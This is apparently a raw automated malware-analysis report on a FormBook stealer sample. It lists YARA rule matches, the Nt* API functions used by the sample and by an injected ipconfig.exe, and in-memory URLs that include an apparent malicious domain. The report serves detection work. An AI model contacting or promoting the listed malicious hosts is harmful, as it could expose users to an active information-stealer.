          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://validasikan.hostinger.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/10_Best_Mutual_Funds.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApac
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Contact_Lens.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQEGFH
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Credit_Card_Application.cfm?fp=RL0iRorVcqOHUP0XclK7g10euA
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Designer_Apparel.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Health_Insurance.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Healthy_Weight_Loss.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacs
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Top_Smart_Phones.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/display.cfm
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/px.js?ch=1
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/px.js?ch=2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/sk-logabpstatus.php?a=RDhNb29EdmFqY0hTT1dvU2IrckNTa1BKc2l
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: scn14092020.exeString found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316C404 NtSetInformationThread,0_2_0316C404
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316C402 NtSetInformationThread,0_2_0316C402
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316CD82 NtSetInformationThread,0_2_0316CD82
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417987 NtReadFile,1_2_00417987
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F998F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00F998F0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00F99860
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99840 NtDelayExecution,LdrInitializeThunk,1_2_00F99840
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F999A0 NtCreateSection,LdrInitializeThunk,1_2_00F999A0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00F99910
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99A50 NtCreateFile,LdrInitializeThunk,1_2_00F99A50
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99A20 NtResumeThread,LdrInitializeThunk,1_2_00F99A20
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00F99A00
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F995D0 NtClose,LdrInitializeThunk,1_2_00F995D0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99540 NtReadFile,LdrInitializeThunk,1_2_00F99540
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F996E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00F996E0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00F99660
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99FE0 NtCreateMutant,LdrInitializeThunk,1_2_00F99FE0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F997A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00F997A0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99780 NtMapViewOfSection,LdrInitializeThunk,1_2_00F99780
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99710 NtQueryInformationToken,LdrInitializeThunk,1_2_00F99710
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F998A0 NtWriteVirtualMemory,1_2_00F998A0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F9B040 NtSuspendThread,1_2_00F9B040
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99820 NtEnumerateKey,1_2_00F99820
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F999D0 NtCreateProcessEx,1_2_00F999D0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99950 NtQueueApcThread,1_2_00F99950
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99A80 NtOpenDirectoryObject,1_2_00F99A80
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99A10 NtQuerySection,1_2_00F99A10
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F9A3B0 NtGetContextThread,1_2_00F9A3B0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99B00 NtSetValueKey,1_2_00F99B00
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F995F0 NtQueryInformationFile,1_2_00F995F0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99560 NtWriteFile,1_2_00F99560
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F9AD30 NtSetContextThread,1_2_00F9AD30
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99520 NtWaitForSingleObject,1_2_00F99520
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F996D0 NtCreateKey,1_2_00F996D0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99670 NtQueryInformationProcess,1_2_00F99670
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99650 NtQueryValueKey,1_2_00F99650
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99610 NtEnumerateValueKey,1_2_00F99610
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F9A770 NtOpenThread,1_2_00F9A770
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99770 NtSetInformationFile,1_2_00F99770
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99760 NtOpenProcess,1_2_00F99760
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F99730 NtQueryVirtualMemory,1_2_00F99730
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F9A710 NtOpenProcessToken,1_2_00F9A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9A50 NtCreateFile,LdrInitializeThunk,4_2_02CE9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9B00 NtSetValueKey,LdrInitializeThunk,4_2_02CE9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9840 NtDelayExecution,LdrInitializeThunk,4_2_02CE9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02CE9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE99A0 NtCreateSection,LdrInitializeThunk,4_2_02CE99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02CE9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE96D0 NtCreateKey,LdrInitializeThunk,4_2_02CE96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02CE96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9FE0 NtCreateMutant,LdrInitializeThunk,4_2_02CE9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9780 NtMapViewOfSection,LdrInitializeThunk,4_2_02CE9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9710 NtQueryInformationToken,LdrInitializeThunk,4_2_02CE9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE95D0 NtClose,LdrInitializeThunk,4_2_02CE95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9540 NtReadFile,LdrInitializeThunk,4_2_02CE9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9A80 NtOpenDirectoryObject,4_2_02CE9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9A00 NtProtectVirtualMemory,4_2_02CE9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9A10 NtQuerySection,4_2_02CE9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9A20 NtResumeThread,4_2_02CE9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEA3B0 NtGetContextThread,4_2_02CEA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE98F0 NtReadVirtualMemory,4_2_02CE98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE98A0 NtWriteVirtualMemory,4_2_02CE98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEB040 NtSuspendThread,4_2_02CEB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9820 NtEnumerateKey,4_2_02CE9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE99D0 NtCreateProcessEx,4_2_02CE99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9950 NtQueueApcThread,4_2_02CE9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9650 NtQueryValueKey,4_2_02CE9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9660 NtAllocateVirtualMemory,4_2_02CE9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9670 NtQueryInformationProcess,4_2_02CE9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9610 NtEnumerateValueKey,4_2_02CE9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE97A0 NtUnmapViewOfSection,4_2_02CE97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9760 NtOpenProcess,4_2_02CE9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEA770 NtOpenThread,4_2_02CEA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9770 NtSetInformationFile,4_2_02CE9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEA710 NtOpenProcessToken,4_2_02CEA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9730 NtQueryVirtualMemory,4_2_02CE9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE95F0 NtQueryInformationFile,4_2_02CE95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9560 NtWriteFile,4_2_02CE9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9520 NtWaitForSingleObject,4_2_02CE9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEAD30 NtSetContextThread,4_2_02CEAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7A60 NtClose,4_2_024C7A60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7930 NtCreateFile,4_2_024C7930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C79E0 NtReadFile,4_2_024C79E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C79DA NtReadFile,4_2_024C79DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7987 NtReadFile,4_2_024C7987
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_031604C00_2_031604C0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316A8700_2_0316A870
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316CF790_2_0316CF79
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_03162C780_2_03162C78
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_0316A85F0_2_0316A85F
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041C2A71_2_0041C2A7
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041ABE31_2_0041ABE3
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041ABE61_2_0041ABE6
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041B4641_2_0041B464
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041BCC51_2_0041BCC5
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041B6191_2_0041B619
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F820A01_2_00F820A0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F6B0901_2_00F6B090
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F7A8301_2_00F7A830
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010110021_2_01011002
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0102E8241_2_0102E824
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F799BF1_2_00F799BF
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010220A81_2_010220A8
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F741201_2_00F74120
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010228EC1_2_010228EC
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F5F9001_2_00F5F900
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_01022B281_2_01022B28
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0101DBD21_2_0101DBD2
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010103DA1_2_010103DA
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0100FA2B1_2_0100FA2B
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F8EBB01_2_00F8EBB0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010222AE1_2_010222AE
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F7AB401_2_00F7AB40
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_01022D071_2_01022D07
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_01021D551_2_01021D55
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_010225DD1_2_010225DD
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F6841F1_2_00F6841F
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F6D5E01_2_00F6D5E0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0101D4661_2_0101D466
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F825811_2_00F82581
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F50D201_2_00F50D20
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00F76E301_2_00F76E30
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0102DFCE1_2_0102DFCE
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_01021FF11_2_01021FF1
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0101D6161_2_0101D616
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_01022EF71_2_01022EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D722AE4_2_02D722AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D5FA2B4_2_02D5FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D6DBD24_2_02D6DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D603DA4_2_02D603DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CDEBB04_2_02CDEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CCAB404_2_02CCAB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D72B284_2_02D72B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D728EC4_2_02D728EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CBB0904_2_02CBB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CD20A04_2_02CD20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D720A84_2_02D720A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D610024_2_02D61002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D7E8244_2_02D7E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CAF9004_2_02CAF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CC41204_2_02CC4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D72EF74_2_02D72EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D6D6164_2_02D6D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CC6E304_2_02CC6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D7DFCE4_2_02D7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D71FF14_2_02D71FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D6D4664_2_02D6D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CB841F4_2_02CB841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D725DD4_2_02D725DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CBD5E04_2_02CBD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CD25814_2_02CD2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D71D554_2_02D71D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02D72D074_2_02D72D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CA0D204_2_02CA0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024B8A404_2_024B8A40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CC2A74_2_024CC2A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CABE64_2_024CABE6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CABE34_2_024CABE3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CB6194_2_024CB619
